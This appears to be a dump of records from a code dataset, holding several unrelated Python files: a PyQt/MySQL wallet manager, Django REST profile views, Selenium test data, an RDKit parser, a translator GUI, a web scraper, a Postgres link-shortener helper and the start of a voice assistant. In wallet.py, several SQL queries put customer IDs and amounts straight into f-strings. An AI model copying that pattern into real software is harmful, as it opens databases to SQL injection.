QVBoxLayout()\n # adding form group box to the layout\n mainLayout.addWidget(self.content_lable)\n mainLayout.addWidget(self.target_period)\n mainLayout.addWidget(self.formGroupBox)\n # adding button box to the layout\n mainLayout.addLayout(self.buttonBox)\n # setting lay out\n self.setLayout(mainLayout)\n 
self.saveButton.clicked.connect(self.accept)\n self.cancleButton.clicked.connect(self.reject)\n\n def formValidation(self, is_valid):\n if is_valid:\n self.saveButton.setEnabled(True)\n else:\n self.saveButton.setDisabled(True)\n def accept(self):\n self.saveTransition()\n self.close()\n def saveTransition(self):\n try:\n mydb =Sql_DB()\n myConnection=mydb.db_connect()\n mycursor = myConnection.cursor()\n\n amount=int(self.transition_amount.form_control.text())\n target_period=self.periodNameDict.get(self.target_period.form_control.currentText())\n \n discharge_sql = \"\"\"INSERT INTO wallet (type,customerId,amount) \n VALUES (%s,%s,%s)\"\"\"\n val = (False,self.customer_id,amount)\n mycursor.execute(discharge_sql, val)\n myConnection.commit()\n check_query=F\"\"\"SELECT Id,Amount \n FROM payments\n WHERE CustomerId='{self.customer_id}' and PeriodId='{target_period}'\"\"\"\n mycursor.execute(check_query)\n isExist=mycursor.fetchone()\n if isExist:\n update_query=F\"\"\"UPDATE payments set amount='{isExist[1]+amount}' \n WHERE Id='{isExist[0]}'\"\"\"\n mycursor.execute(update_query)\n myConnection.commit() \n messageBoxDialog.show_info_messagebox(\"the money has been transmited to payment successfully\") \n return\n payment_sql=\"\"\" INSERT INTO payments (status,customerId,PeriodId,amount) VALUES (%s,%s,%s,%s)\"\"\"\n val=(1,self.customer_id,target_period,amount)\n mycursor.execute(payment_sql,val)\n myConnection.commit()\n messageBoxDialog.show_info_messagebox(\"the money has been transmited successfully\")\n self.createNewOne.emit(True)\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(f\"{e}\")\nclass WalletList(QWidget):\n update_tabel=pyqtSignal(bool)\n def __init__(self):\n super().__init__()\n self.setMinimumSize(QSize(400, 700))\n self.setWindowTitle(\"List Of Wallets\")\n self.superLayout=QVBoxLayout(self)\n self.wallet_table=self.walletTable()\n self.superLayout.addWidget(self.wallet_table)\n\n def updateTable(self):\n print(\"\")\n def walletTable(self):\n data=self.getWallets() \n table=QTableWidget()\n table.setColumnCount(2)\n table.setRowCount(len(data))\n table.setMinimumWidth(1000)\n table.setMinimumHeight(500)\n table.setHorizontalHeaderLabels([\"customer\",\"content\"])\n n=0\n for key in data:\n tableItem=QTableWidgetItem(str(key))\n tableItem1=QTableWidgetItem(str(data[key]))\n table.setItem(n,0,tableItem)\n table.setItem(n,1,tableItem1)\n n+=1\n table.resizeColumnsToContents()\n table.resizeRowsToContents() \n return table\n def getWallets(self):\n try:\n print(\"\")\n connection=Sql_DB().db_connect()\n my_cursor=connection.cursor()\n wallet_query=\"\"\"SELECT content,\n TYPE , customerId, name, family\n FROM customers\n JOIN (\n\n SELECT SUM( amount ) AS content,\n TYPE , customerId\n FROM wallet\n GROUP BY customerId,\n TYPE\n )W ON customers.id = W.customerId\"\"\"\n my_cursor.execute(wallet_query)\n wallets=my_cursor.fetchall()\n wal_dic={}\n for rec in wallets:\n if not wal_dic.get(F\"{rec[3]} {rec[4]} ({rec[2]})\"):\n wal_dic[F\"{rec[3]} {rec[4]} ({rec[2]})\"]=0\n if rec[1]:#type of wallet record is charged\n wal_dic[F\"{rec[3]} {rec[4]} ({rec[2]})\"]+=rec[0]\n else: #type of wallet record is discharged\n wal_dic[F\"{rec[3]} {rec[4]} ({rec[2]})\"]-=rec[0]\n return wal_dic\n\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(F\"{e}\") \ndef getTotal(customer_id):\n total_charge=0\n total_discharge=0\n try:\n connection=Sql_DB().db_connect()\n mycursor=connection.cursor()\n query=F\"\"\"SELECT SUM(amount),Type \n FROM wallet \n 
WHERE customerId='{customer_id}' \n GROUP BY Type\n \"\"\"\n mycursor.execute(query)\n res=mycursor.fetchall()\n for rec in res:\n if rec[1]:\n total_charge=rec[0]\n else:\n total_discharge=rec[0]\n wallet_content=total_charge-total_discharge\n return wallet_content\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(f\"{e}\") \n\nif __name__==\"__main__\":\n import sys\n app=QApplication(sys.argv)\n #ui=WalletList()\n ui=WalletTransitionForm(1001)\n ui.show()\n sys.exit(app.exec_())\n", "repo_name": "fahime87/ehasnovin_investment_fund", "sub_path": "wallet.py", "file_name": "wallet.py", "file_ext": "py", "file_size_in_byte": 13691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 13, "usage_type": "call"}, {"api_name": "tools.FormGroup", "line_number": 20, "usage_type": "call"}, {"api_name": "tools.FormControl", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 37, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 58, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog.show_info_messagebox", "line_number": 67, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 67, "usage_type": "name"}, {"api_name": "mysql.connector.Error", "line_number": 69, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 71, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 78, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 80, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 82, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 90, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 94, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 106, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 120, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 129, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 131, "usage_type": 
"call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 133, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 143, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 153, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 153, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 154, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 154, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 155, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 156, "usage_type": "call"}, {"api_name": "tools.FormGroup", "line_number": 163, "usage_type": "call"}, {"api_name": "tools.FormControl", "line_number": 167, "usage_type": "call"}, {"api_name": "period.getperiodNamesById", "line_number": 172, "usage_type": "call"}, {"api_name": "tools.ComboBoxControl", "line_number": 173, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 177, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 178, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 180, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 183, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 185, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 207, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog.show_info_messagebox", "line_number": 229, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 229, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_info_messagebox", "line_number": 235, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 235, "usage_type": "name"}, {"api_name": "mysql.connector.Error", "line_number": 237, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 237, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 238, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 238, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 239, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 240, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 243, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 245, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 253, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 261, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 262, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 272, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 297, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 297, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 298, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 298, "usage_type": "name"}, {"api_name": "dataBase.Sql_DB", "line_number": 303, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 319, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 319, "usage_type": "name"}, 
{"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 320, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 320, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 324, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 324, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "9092142197", "text": "from rest_framework import mixins, status\r\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.viewsets import GenericViewSet\r\n\r\nfrom .models import Experience, Profile\r\nfrom .permissions import HasProfileAndIsOwnerPermission, IsProfileOwnerPermission\r\nfrom .serializers import ExperienceSerializer, ProfileSerializer\r\nfrom .services import check_user_has_profile, get_user_profile\r\n\r\n\r\nclass ProfileViewSet(\r\n mixins.CreateModelMixin,\r\n mixins.RetrieveModelMixin,\r\n mixins.UpdateModelMixin,\r\n mixins.DestroyModelMixin,\r\n GenericViewSet,\r\n):\r\n \"\"\"\r\n Set of Profile controllers.\r\n\r\n Creating profile. One user can has only one profile.\r\n \"\"\"\r\n\r\n queryset = Profile.objects.all()\r\n serializer_class = ProfileSerializer\r\n permission_classes = [IsAuthenticatedOrReadOnly, IsProfileOwnerPermission]\r\n\r\n def create(self, request, *args, **kwargs):\r\n if check_user_has_profile(request.user):\r\n return Response(\r\n {\"error\": \"Cannot create profile, when you have profile already\"}, status.HTTP_400_BAD_REQUEST\r\n )\r\n\r\n return super().create(request, *args, **kwargs)\r\n\r\n def perform_create(self, serializer):\r\n serializer.save(user=self.request.user)\r\n\r\n\r\nclass ExperienceViewSet(\r\n mixins.CreateModelMixin,\r\n mixins.RetrieveModelMixin,\r\n mixins.UpdateModelMixin,\r\n mixins.DestroyModelMixin,\r\n GenericViewSet,\r\n):\r\n \"\"\"\r\n Set of Experience controllers.\r\n\r\n Creating experience. 
User can create experience if he has profile.\r\n User can create many experiences.\r\n \"\"\"\r\n\r\n queryset = Experience.objects.all()\r\n serializer_class = ExperienceSerializer\r\n permission_classes = [IsAuthenticatedOrReadOnly, HasProfileAndIsOwnerPermission]\r\n\r\n def create(self, request, *args, **kwargs):\r\n profile = get_user_profile(request.user.pk)\r\n if not profile:\r\n return Response(\r\n {\"error\": \"Cannot create experience, when you don't have profile\"}, status.HTTP_400_BAD_REQUEST\r\n )\r\n serializer = self.get_serializer(data=request.data)\r\n serializer.is_valid(raise_exception=True)\r\n self.perform_create(serializer)\r\n headers = self.get_success_headers(serializer.data)\r\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\r\n\r\n def perform_create(self, serializer) -> None:\r\n serializer.save(profile=self.request.user.profile)\r\n", "repo_name": "LinkerApplication/cv-generator", "sub_path": "backend/generator/profile/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 16, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Profile.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Profile.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 25, "usage_type": "name"}, {"api_name": "serializers.ProfileSerializer", "line_number": 26, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly", "line_number": 27, "usage_type": "name"}, {"api_name": "permissions.IsProfileOwnerPermission", "line_number": 27, "usage_type": "name"}, {"api_name": "services.check_user_has_profile", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 32, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 45, 
"usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 45, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Experience.objects.all", "line_number": 55, "usage_type": "call"}, {"api_name": "models.Experience.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.Experience", "line_number": 55, "usage_type": "name"}, {"api_name": "serializers.ExperienceSerializer", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly", "line_number": 57, "usage_type": "name"}, {"api_name": "permissions.HasProfileAndIsOwnerPermission", "line_number": 57, "usage_type": "name"}, {"api_name": "services.get_user_profile", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 62, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 63, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 63, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 69, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 69, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "18901630694", "text": "import openpyxl\n\n\nclass HomePageData:\n test_HomePage_data = [{\"firstname\": \"Lucija\", \"email\": \"mail@example.com\", \"gender\": \"Female\"},\n {\"firstname\": \"Jens\", \"email\": \"mail2@example.com\", \"gender\": \"Male\"}]\n\n @staticmethod\n def getTestData(test_case_name):\n\n book = openpyxl.load_workbook(\"C:\\\\Users\\\\lucij\\\\Documents\\\\PythonDemo.xlsx\")\n sheet = book.active\n dictionary = {}\n\n for i in range(1, sheet.max_row + 1):\n if sheet.cell(row=i, column=1).value == \"Testcase2\":\n for j in range(2, sheet.max_column + 1):\n dictionary[sheet.cell(row=1, column=j).value] = sheet.cell(row=i, column=j).value\n\n return [dictionary]\n", "repo_name": "lucijacovic/selenium", "sub_path": "testData/HomePageData.py", "file_name": "HomePageData.py", "file_ext": "py", "file_size_in_byte": 730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "35414158039", "text": "import json\nfrom rdkit import Chem\nimport pandas as pd\n\n\n\n\ndef reactant_product_pair():\n file=open('Knowledge Base for Metabolites\\MetXBioDB-1-0.json',encoding='utf8')\n reactants=[]\n reaction_product_pairs=[]\n data=json.load(file,encoding='utf8') \n for i in data['biotransformations']:\n entry_rp={}\n entry_rp['Substrate_Name']=data['biotransformations'][i]['Substrate']['Name']\n substrate_mol=Chem.inchi.MolFromInchi(str(data['biotransformations'][i]['Substrate']['InChI']))\n entry_rp['SubstrateMolecule']=substrate_mol\n entry_rp['METXBIODB_ID']=str(data['biotransformations'][i]['Substrate']['METXBIODB_ID'])\n entry_rp['Enzymes']=list(str(data['biotransformations'][i]['Enzyme(s)']).split(\";\"))\n entry_rp['BioTransformer_type']=data['biotransformations'][i]['Biotransformation type']\n entry_rp['BioSystem']=data['biotransformations'][i]['Biosystem']\n \n for x in data['biotransformations'][i]['Products']:\n products=[]\n entry_product={}\n entry_product['Product_Name']=x.get('Name')\n 
prodcut_mol=Chem.inchi.MolFromInchi(str(x.get('InChI')))\n entry_product['Product_Molecule']=prodcut_mol\n products.append(entry_product)\n \n \n entry_rp['Products']=products \n rc={}\n for j in entry_rp.keys():\n if j!='Products':\n rc[str(j)]=entry_rp[str(j)]\n \n \n reaction_product_pairs.append(entry_rp) \n reactants.append(rc)\n return reactants\n \n \ndef Extract_MetX_from_Ref():\n file=open('Knowledge Base for Metabolites\\metaboliteprediction_referencedataset.json',encoding='utf8')\n data=json.load(file,encoding='utf8')\n p_mol=0\n met_mol=0\n\n for x in data:\n \n a=len(x['Metabolites'])\n met_mol+=a\n \n\n \n", "repo_name": "AbhinavTalari/BayesLabs-Internship", "sub_path": "reference_data.py", "file_name": "reference_data.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 12, "usage_type": "call"}, {"api_name": "rdkit.Chem.inchi.MolFromInchi", "line_number": 16, "usage_type": "call"}, {"api_name": "rdkit.Chem.inchi", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 16, "usage_type": "name"}, {"api_name": "rdkit.Chem.inchi.MolFromInchi", "line_number": 27, "usage_type": "call"}, {"api_name": "rdkit.Chem.inchi", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 27, "usage_type": "name"}, {"api_name": "json.load", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "11965664761", "text": "from bs4 import BeautifulSoup\r\nimport requests\r\n\r\ndef check_use(drug_name):\r\n output = {}\r\n page = f'https://pharmeasy.in/search/all?name={drug_name}'\r\n\r\n source=requests.get(page)\r\n soup=BeautifulSoup(source.text,'html')\r\n body = soup.body.findAll ('a' ,{'class':'ProductCard_medicineUnitWrapper__238qP ProductCard_defaultWrapper__3htqi'})\r\n\r\n source = requests.get('https://pharmeasy.in/'+str(body[0]).split('\"')[3])\r\n soup=BeautifulSoup(source.text,'html')\r\n \r\n body = soup.body.findAll ('td' ,{'class':'DescriptionTable_field__1aXTD'})\r\n body1 = soup.body.findAll ('td' ,{'class':'DescriptionTable_value__1afug'})\r\n body2 = soup.body.findAll ('div' ,{'class':'Section_section__QOSbs'})\r\n\r\n if len(body2) ==0: return \"Sorry we couldn\\'t find the use cases \"\r\n \r\n for i in zip(body ,body1): output[str((i[0])).split('>')[1].split('<')[0]] = str((i[1])).split('>')[1].split('<')[0]\r\n \r\n try :\r\n output['Side effects'] = output[''] \r\n del(output[''] )\r\n \r\n except KeyError:\r\n pass\r\n \r\n return output\r\n \r\n", "repo_name": "sukeshan/Identifying-the-purpose-of-the-tablet", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 1096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "38356644129", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 4 10:32:44 2023\n\n@author: DIGITS\n\"\"\"\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom googletrans import Translator, LANGUAGES\n\n# from google_trans_new import google_translator \n# translator = google_translator() \n# translate_text = 
translator.translate('hello world',lang_src='en',lang_tgt='zh',pronounce=True) \n# print(translate_text)\n\nroot = Tk()\nroot.geometry(\"1100x320\")\nroot.resizable(0,0)\n#root.iconbitmap['.ico']\nroot['bg'] = 'lightgreen'\n\nroot.title('Language Translator App')\nLabel(root, text=\"Language Translator\", font=\"Arial 20 bold\", bg=\"skyblue\").pack()\n\nLabel(root, text=\"Enter Text\", font=\"arial 13 bold\", bg=\"White\").place(x=165, y=90)\n\nInput_text = Entry(root, width=60)\nInput_text.place(x=30, y=130)\nInput_text.get()\n\nLabel(root, text=\"Output\", font=\"Arial 13 bold\", bg=\"White\").place(x=780, y=90)\nOutput_text = Text(root, font=\"arial 10\", height=5, wrap= WORD, padx=5, pady=5, width=50)\nOutput_text.place(x=600, y=130)\n\nlanguages = list(LANGUAGES.values())\n\ndest_lang = ttk.Combobox(root, values=languages, width=22)\ndest_lang.place(x=130, y=180)\ndest_lang.set(\"choose language\")\n\ndef Translate():\n translator = Translator()\n translated = translator.translate(text=Input_text.get(), dest=dest_lang.get())\n Output_text.delete(1.0, END)\n Output_text.insert(END, translated.text)\n \ntrans_btn = Button(root, text=\"Translate\", font=\"arial 17 bold\", pady=5, command= Translate, bg=\"skyblue\", activebackground=\"green\")\ntrans_btn.place(x=445, y=180) \n \nroot.mainloop()\n", "repo_name": "Digital-101/Language-Translation", "sub_path": "LanguageTranslator.py", "file_name": "LanguageTranslator.py", "file_ext": "py", "file_size_in_byte": 1553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "googletrans.LANGUAGES.values", "line_number": 36, "usage_type": "call"}, {"api_name": "googletrans.LANGUAGES", "line_number": 36, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 38, "usage_type": "name"}, {"api_name": "googletrans.Translator", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "43280724094", "text": "import psycopg2\nimport urllib.parse as up\nimport re\nimport os\nfrom dotenv import load_dotenv\n\nAPP_ROOT = os.path.join(os.path.dirname(__file__), '.')\ndotenv_path = os.path.join(APP_ROOT, '.env')\nload_dotenv(dotenv_path)\n\ndb_url = os.getenv('DATABASE_URL')\n\nup.uses_netloc.append(\"postgres\")\nurl = up.urlparse(db_url)\n\n\ndef create_connection():\n '''\n create connection to database instance\n '''\n connection = psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n\n try:\n create_table_query = '''CREATE TABLE tits(\n tinyurl TEXT,\n link TEXT\n )\n '''\n cursor = connection.cursor()\n # cursor.execute(create_table_query)\n connection.commit()\n print(cursor)\n except Exception as error:\n print(\"couldn't create table\")\n print(error)\n\n print('connection to database successfull')\n\n\ndef drop_table():\n connection = psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n\n cursor = connection.cursor()\n drop_table_query = '''DROP TABLE tits CASCADE;'''\n cursor.execute(drop_table_query)\n connection.commit()\n print('table dropped successfully')\n\n\ndef save_if_not_exist(key, value):\n '''Save tinyurl and link in database if tinyurl doesn\\'t exist'''\n data = get_link(key)\n if data:\n return False\n\n save_link(key, value)\n return True\n\n\ndef save_link(tinyurl, link):\n try:\n connection = 
psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n\n cursor = connection.cursor()\n postgres_insert_query = \"\"\" INSERT INTO tits (tinyurl, link) VALUES (%s, %s)\"\"\"\n\n record_to_insert = (tinyurl, link)\n print(record_to_insert)\n cursor.execute(postgres_insert_query, record_to_insert)\n\n connection.commit()\n print('records inserted')\n except Exception as error:\n if(connection):\n print('failed to insert record to db', error)\n\n\ndef get_link(filter=None):\n '''\n Retrieve link associated with tinyurl in the database\n '''\n\n try:\n connection = psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n cursor = connection.cursor()\n postgreSQL_select_Query = \"\"\"\n SELECT *\n FROM tits\n \"\"\"\n params = []\n if filter is not None:\n postgreSQL_select_Query += \"WHERE position(%s in tinyurl) > 0\"\n params.append(filter)\n cursor.execute(postgreSQL_select_Query, tuple(params))\n # print(\"Selecting rows from tips table using cursor.fetchall\")\n\n return cursor.fetchone()\n except Exception as error:\n print('failed to get record(s) from db', error)\n", "repo_name": "shadrach-tayo/Titsly", "sub_path": "db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 3626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.parse.uses_netloc.append", "line_number": 13, "usage_type": "call"}, {"api_name": "urllib.parse.uses_netloc", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 13, "usage_type": "name"}, {"api_name": "urllib.parse.urlparse", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 14, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 46, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 72, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "32573773409", "text": "### Librerías a utilizar ########\n\nfrom bs4 import BeautifulSoup\nfrom time import time\nfrom googletrans import Translator\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\nimport pandas as pd, subprocess as sub, AVMSpeechMath as sm, random, calendar, subprocess\nimport time, wikipedia, pyjokes, pywhatkit, AVMYT as yt, pyautogui, webbrowser, pyperclip, json, speech_recognition as sr, requests, pyttsx3, datetime\n\n### Nombre y comando del asistente ###\nname = 'alexa'\nlistener = sr.Recognizer()\nengine = pyttsx3.init('sapi5')\n\n# Voz y velocidad del asistente\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[0].id)\n\n#Imprimir que voces tiene tu compuatdor\n#for voice in voices:\n 
